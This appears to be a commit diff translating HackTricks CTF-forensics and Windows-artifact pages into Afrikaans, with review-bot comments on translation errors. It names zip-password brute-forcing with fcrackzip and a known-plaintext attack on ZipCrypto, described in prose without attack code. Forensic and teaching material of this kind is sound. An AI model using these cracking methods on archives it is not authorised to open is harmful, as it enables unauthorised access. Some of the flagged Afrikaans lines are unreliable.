Vir die nagaan van die integriteit van PNG-lêers en die herstel van korrupte lêers, is **pngcheck** 'n noodsaaklike gereedskap wat opdraggelynfunksionaliteit bied om PNG-lêers te valideer en te diagnoseer ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html)). Wanneer lêers buite eenvoudige herstel is, bied aanlyn dienste soos [OfficeRecovery se PixRecovery](https://online.officerecovery.com/pixrecovery/) 'n webgebaseerde oplossing vir die herstel van korrupte PNG's, wat kan help om belangrike data vir CTF-deelnemers te herwin.
|
||||
|
||||
These strategies underscore the importance of a comprehensive approach in CTFs, utilizing a blend of analytical tools and repair techniques to uncover and recover hidden or lost data.
|
||||
Hierdie strategieë beklemtoon die belang van 'n omvattende benadering in CTF's, waarin 'n kombinasie van analitiese gereedskap en hersteltegnieke gebruik word om verborge of verlore data te ontdek en te herwin.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
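Review bot: the translated Wireshark sentence in this hunk no longer says what the source line says. The source reads "Tools like **Wireshark** enable the analysis of PNG files by dissecting their data within network packets", but the replacement "Hul data kan ontleed word deur hul netwerkpakketten met behulp van hul gereedskap soos **Wireshark**" repeats "hul" three times with no clear referent and uses the Dutch form "netwerkpakketten" (Afrikaans: "netwerkpakkette"). Suggest: "Gereedskap soos **Wireshark** maak dit moontlik om PNG-lêers te ontleed deur hul data binne netwerkpakkette uit te haal, wat ingebedde inligting of anomalieë kan onthul." The pngcheck and PixRecovery sentences are fine as translated.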
@ -1,45 +1,41 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
**Audio and video file manipulation** is a staple in **CTF forensics challenges**, leveraging **steganography** and metadata analysis to hide or reveal secret messages. Tools such as **[mediainfo](https://mediaarea.net/en/MediaInfo)** and **`exiftool`** are essential for inspecting file metadata and identifying content types.
|
||||
**Audio- en videobestandmanipulasie** is 'n kenmerkende aspek in **CTF-forensiese uitdagings**, wat gebruik maak van **steganografie** en metadata-analise om geheime boodskappe te verberg of te onthul. Gereedskap soos **[mediainfo](https://mediaarea.net/en/MediaInfo)** en **`exiftool`** is noodsaaklik vir die ondersoek van lêermetadata en die identifisering van inhoudstipes.
|
||||
|
||||
For audio challenges, **[Audacity](http://www.audacityteam.org/)** stands out as a premier tool for viewing waveforms and analyzing spectrograms, essential for uncovering text encoded in audio. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** is highly recommended for detailed spectrogram analysis. **Audacity** allows for audio manipulation like slowing down or reversing tracks to detect hidden messages. **[Sox](http://sox.sourceforge.net/)**, a command-line utility, excels in converting and editing audio files.
|
||||
Vir klankuitdagings steek **[Audacity](http://www.audacityteam.org/)** uit as 'n voorste gereedskap vir die besigtiging van golfvorme en die analise van spektrogramme, wat noodsaaklik is vir die ontdekking van teks wat in klank gekodeer is. **[Sonic Visualiser](http://www.sonicvisualiser.org/)** word sterk aanbeveel vir gedetailleerde spektrogramanalise. **Audacity** maak klankmanipulasie soos vertraging of omkeer van spore moontlik om verborge boodskappe op te spoor. **[Sox](http://sox.sourceforge.net/)**, 'n opdraglyn-hulpprogram, blink uit in die omskakeling en redigering van klanklêers.
|
||||
|
||||
**Least Significant Bits (LSB)** manipulation is a common technique in audio and video steganography, exploiting the fixed-size chunks of media files to embed data discreetly. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is useful for decoding messages hidden as **DTMF tones** or **Morse code**.
|
||||
**Least Significant Bits (LSB)**-manipulasie is 'n algemene tegniek in klank- en videosteganografie, wat gebruik maak van die vaste-grootte brokkies van mediabestande om data heimlik in te bed. **[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** is nuttig vir die ontsluiting van boodskappe wat versteek is as **DTMF-tone** of **Morsekode**.
|
||||
|
||||
Video challenges often involve container formats that bundle audio and video streams. **[FFmpeg](http://ffmpeg.org/)** is the go-to for analyzing and manipulating these formats, capable of de-multiplexing and playing back content. For developers, **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** integrates FFmpeg's capabilities into Python for advanced scriptable interactions.
|
||||
Videouitdagings behels dikwels houerformate wat klank- en videostrome saambind. **[FFmpeg](http://ffmpeg.org/)** is die go-to-gereedskap vir die analise en manipulasie van hierdie formate, wat in staat is om inhoud te demultipleks en af te speel. Vir ontwikkelaars integreer **[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** FFmpeg se vermoëns in Python vir gevorderde skriptbare interaksies.
|
||||
|
||||
This array of tools underscores the versatility required in CTF challenges, where participants must employ a broad spectrum of analysis and manipulation techniques to uncover hidden data within audio and video files.
|
||||
Hierdie verskeidenheid gereedskap beklemtoon die veelsydigheid wat vereis word in CTF-uitdagings, waar deelnemers 'n breë spektrum van analise- en manipulasietegnieke moet gebruik om verborge data binne klank- en videobestande te ontbloot.
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
* [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
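Review bot: several terms in this hunk are Dutch rather than Afrikaans, and one compound lost its hyphen. "Audio- en videobestandmanipulasie" and "klank- en videobestande" use "bestand", while the same hunk correctly writes "klanklêers" two lines earlier; use "lêer" throughout ("Klank- en videolêermanipulasie", "klank- en videolêers"). "Videouitdagings" should be "Video-uitdagings", matching the hyphenated "CTF-uitdagings" on the same page. "die go-to-gereedskap" leaves an English idiom in the text; "die aangewese gereedskap" reads naturally. Keeping the tool names (mediainfo, Audacity, Sox, FFmpeg, ffmpy) untranslated is correct.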
@ -1,44 +1,44 @@
|
|||
# ZIPs tricks
|
||||
# ZIP-truuks
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
**Command-line tools** for managing **zip files** are essential for diagnosing, repairing, and cracking zip files. Here are some key utilities:
|
||||
**Opdraglynhulpmiddels** vir die bestuur van **zip-lêers** is noodsaaklik vir die diagnose, herstel en kraak van zip-lêers. Hier is 'n paar sleutelhulpprogramme:
|
||||
|
||||
- **`unzip`**: Reveals why a zip file may not decompress.
|
||||
- **`zipdetails -v`**: Offers detailed analysis of zip file format fields.
|
||||
- **`zipinfo`**: Lists contents of a zip file without extracting them.
|
||||
- **`zip -F input.zip --out output.zip`** and **`zip -FF input.zip --out output.zip`**: Try to repair corrupted zip files.
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: A tool for brute-force cracking of zip passwords, effective for passwords up to around 7 characters.
|
||||
- **`unzip`**: Onthul waarom 'n zip-lêer nie gedekomprimeer kan word nie.
|
||||
- **`zipdetails -v`**: Bied 'n gedetailleerde analise van die velds van die zip-lêerformaat.
|
||||
- **`zipinfo`**: Lys die inhoud van 'n zip-lêer sonder om dit uit te pak.
|
||||
- **`zip -F input.zip --out output.zip`** en **`zip -FF input.zip --out output.zip`**: Probeer om beskadigde zip-lêers te herstel.
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: 'n Hulpmiddel vir bruto-kragkraak van zip-wagwoorde, effektief vir wagwoorde tot ongeveer 7 karakters.
|
||||
|
||||
The [Zip file format specification](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) provides comprehensive details on the structure and standards of zip files.
|
||||
Die [Zip-lêerformaat spesifikasie](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) bied omvattende besonderhede oor die struktuur en standaarde van zip-lêers.
|
||||
|
||||
It's crucial to note that password-protected zip files **do not encrypt filenames or file sizes** within, a security flaw not shared with RAR or 7z files which encrypt this information. Furthermore, zip files encrypted with the older ZipCrypto method are vulnerable to a **plaintext attack** if an unencrypted copy of a compressed file is available. This attack leverages the known content to crack the zip's password, a vulnerability detailed in [HackThis's article](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) and further explained in [this academic paper](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). However, zip files secured with **AES-256** encryption are immune to this plaintext attack, showcasing the importance of choosing secure encryption methods for sensitive data.
|
||||
Dit is belangrik om daarop te let dat wagwoord-beskermde zip-lêers **nie lêernaam of lêergroottes versleutel nie**, 'n veiligheidsgebrek wat nie gedeel word met RAR- of 7z-lêers wat hierdie inligting versleutel nie. Verder is zip-lêers wat met die ouer ZipCrypto-metode versleutel is, vatbaar vir 'n **platte tekst-aanval** as 'n onversleutelde kopie van 'n saamgedrukte lêer beskikbaar is. Hierdie aanval maak gebruik van die bekende inhoud om die wagwoord van die zip te kraak, 'n kwesbaarheid wat in [HackThis se artikel](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) beskryf word en verder verduidelik word in [hierdie akademiese artikel](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf). Tog is zip-lêers wat met **AES-256**-versleuteling beveilig is, immuun teen hierdie platte tekst-aanval, wat die belangrikheid van die keuse van veilige versleutelingsmetodes vir sensitiewe data beklemtoon.
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
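Review bot: "platte tekst-aanval" for "plaintext attack" is ambiguous in Afrikaans (it reads as "flat text attack"), and the linked HackThis article is about a known-plaintext attack, so render it as "bekende-platteks-aanval (known-plaintext attack)", keeping the English term in parentheses the way this commit keeps "Least Significant Bits (LSB)" in the audio/video file. Likewise "bruto-kragkraak" for brute-force cracking is not a term readers will search for; "brute-force-kraak" keeps the English term visible. The `\~mike` escape in the paper URL and the `## Verwysings` entry are carried over unchanged, which is correct.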
@ -1,526 +1,494 @@
|
|||
# Windows Artifacts
|
||||
# Windows Artefakte
|
||||
|
||||
## Windows Artifacts
|
||||
## Windows Artefakte
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Generic Windows Artifacts
|
||||
## Generiese Windows Artefakte
|
||||
|
||||
### Windows 10 Notifications
|
||||
### Windows 10 Kennisgewings
|
||||
|
||||
In the path `\Users\<username>\AppData\Local\Microsoft\Windows\Notifications` you can find the database `appdb.dat` (before Windows anniversary) or `wpndatabase.db` (after Windows Anniversary).
|
||||
In die pad `\Users\<gebruikersnaam>\AppData\Local\Microsoft\Windows\Notifications` kan jy die databasis `appdb.dat` (voor Windows-verjaarsdag) of `wpndatabase.db` (na Windows-verjaarsdag) vind.
|
||||
|
||||
Inside this SQLite database, you can find the `Notification` table with all the notifications (in XML format) that may contain interesting data.
|
||||
Binne hierdie SQLite-databasis kan jy die `Notification`-tabel vind met al die kennisgewings (in XML-formaat) wat moontlik interessante data kan bevat.
|
||||
|
||||
### Timeline
|
||||
### Tydlyn
|
||||
|
||||
Timeline is a Windows characteristic that provides **chronological history** of web pages visited, edited documents, and executed applications.
|
||||
Tydlyn is 'n Windows-kenmerk wat 'n **chronologiese geskiedenis** van besoekte webbladsye, bewerkte dokumente en uitgevoerde toepassings bied.
|
||||
|
||||
The database resides in the path `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. This database can be opened with an SQLite tool or with the tool [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **which generates 2 files that can be opened with the tool** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
Die databasis bly in die pad `\Users\<gebruikersnaam>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. Hierdie databasis kan geopen word met 'n SQLite-hulpmiddel of met die hulpmiddel [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **wat 2 lêers genereer wat geopen kan word met die hulpmiddel** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
|
||||
### ADS (Alternate Data Streams)
|
||||
### ADS (Alternatiewe Datastrome)
|
||||
|
||||
Files downloaded may contain the **ADS Zone.Identifier** indicating **how** it was **downloaded** from the intranet, internet, etc. Some software (like browsers) usually put even **more** **information** like the **URL** from where the file was downloaded.
|
||||
Gedownloade lêers kan die **ADS Zone.Identifier** bevat wat aandui **hoe** dit van die intranet, internet, ens. afgelaai is. Sommige sagteware (soos webblaaier) plaas gewoonlik selfs **meer** **inligting** soos die **URL** waarvandaan die lêer afgelaai is.
|
||||
|
||||
## **File Backups**
|
||||
## **Lêerback-ups**
|
||||
|
||||
### Recycle Bin
|
||||
### Herwinbin
|
||||
|
||||
In Vista/Win7/Win8/Win10 the **Recycle Bin** can be found in the folder **`$Recycle.bin`** in the root of the drive (`C:\$Recycle.bin`).\
|
||||
When a file is deleted in this folder 2 specific files are created:
|
||||
In Vista/Win7/Win8/Win10 kan die **Herwinbin** in die **`$Recycle.bin`**-map in die hoof van die aandrywing (`C:\$Recycle.bin`) gevind word.\
|
||||
Wanneer 'n lêer in hierdie map uitgevee word, word 2 spesifieke lêers geskep:
|
||||
|
||||
* `$I{id}`: File information (date of when it was deleted}
|
||||
* `$R{id}`: Content of the file
|
||||
* `$I{id}`: Lêerinligting (datum van uitvee}
|
||||
* `$R{id}`: Inhoud van die lêer
|
||||
|
||||
![](<../../../.gitbook/assets/image (486).png>)
|
||||
|
||||
Having these files you can use the tool [**Rifiuti**](https://github.com/abelcheung/rifiuti2) to get the original address of the deleted files and the date it was deleted (use `rifiuti-vista.exe` for Vista – Win10).
|
||||
|
||||
Met hierdie lêers kan jy die hulpmiddel [**Rifiuti**](https://github.com/abelcheung/rifiuti2) gebruik om die oorspronklike adres van die uitgevee lêers en die datum waarop dit uitgevee is, te kry (gebruik `rifiuti-vista.exe` vir Vista - Win10).
|
||||
```
|
||||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
|
||||
|
||||
### Volume Shadow Copies
|
||||
|
||||
Shadow Copy is a technology included in Microsoft Windows that can create **backup copies** or snapshots of computer files or volumes, even when they are in use.
|
||||
Shadow Copy is 'n tegnologie wat ingesluit is in Microsoft Windows wat **back-up kopieë** of afskrifte van rekenaar lêers of volumes kan skep, selfs wanneer hulle in gebruik is.
|
||||
|
||||
These backups are usually located in the `\System Volume Information` from the root of the file system and the name is composed of **UIDs** shown in the following image:
|
||||
Hierdie rugsteun kopieë is gewoonlik geleë in die `\System Volume Information` vanaf die wortel van die lêersisteem en die naam bestaan uit **UIDs** soos getoon in die volgende prentjie:
|
||||
|
||||
![](<../../../.gitbook/assets/image (520).png>)
|
||||
|
||||
Mounting the forensics image with the **ArsenalImageMounter**, the tool [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) can be used to inspect a shadow copy and even **extract the files** from the shadow copy backups.
|
||||
Deur die forensiese beeld te monteer met die **ArsenalImageMounter**, kan die instrument [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) gebruik word om 'n skadukopie te ondersoek en selfs die lêers uit die skadukopie-rugsteunkopieë te **onttrek**.
|
||||
|
||||
![](<../../../.gitbook/assets/image (521).png>)
|
||||
|
||||
The registry entry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` contains the files and keys **to not backup**:
|
||||
Die registerinskrywing `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` bevat die lêers en sleutels **wat nie rugsteunkopieë moet wees nie**:
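Review bot: "bevat die lêers en sleutels **wat nie rugsteunkopieë moet wees nie**" says "which must not be backups", but the source ("to not backup") means the files and keys that are excluded from the backup: "wat nie gerugsteun moet word nie". The term for "backup" is also inconsistent across the added lines in this region: "Lêerback-ups" in the heading, "back-up kopieë" in the Shadow Copy sentence, "rugsteun kopieë" one sentence later and "rugsteunkopieë" in the ShadowCopyView sentence; settle on "rugsteunkopieë" (one word) throughout.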
|
||||
|
||||
![](<../../../.gitbook/assets/image (522).png>)
|
||||
|
||||
The registry `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` also contains configuration information about the `Volume Shadow Copies`.
|
||||
Die register `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` bevat ook konfigurasie-inligting oor die `Volume Shadow Copies`.
|
||||
|
||||
### Office AutoSaved Files
|
||||
### Office AutoSaved-lêers
|
||||
|
||||
You can find the office autosaved files in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
|
||||
Jy kan die kantoor outomatiese gestoorde lêers vind in: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
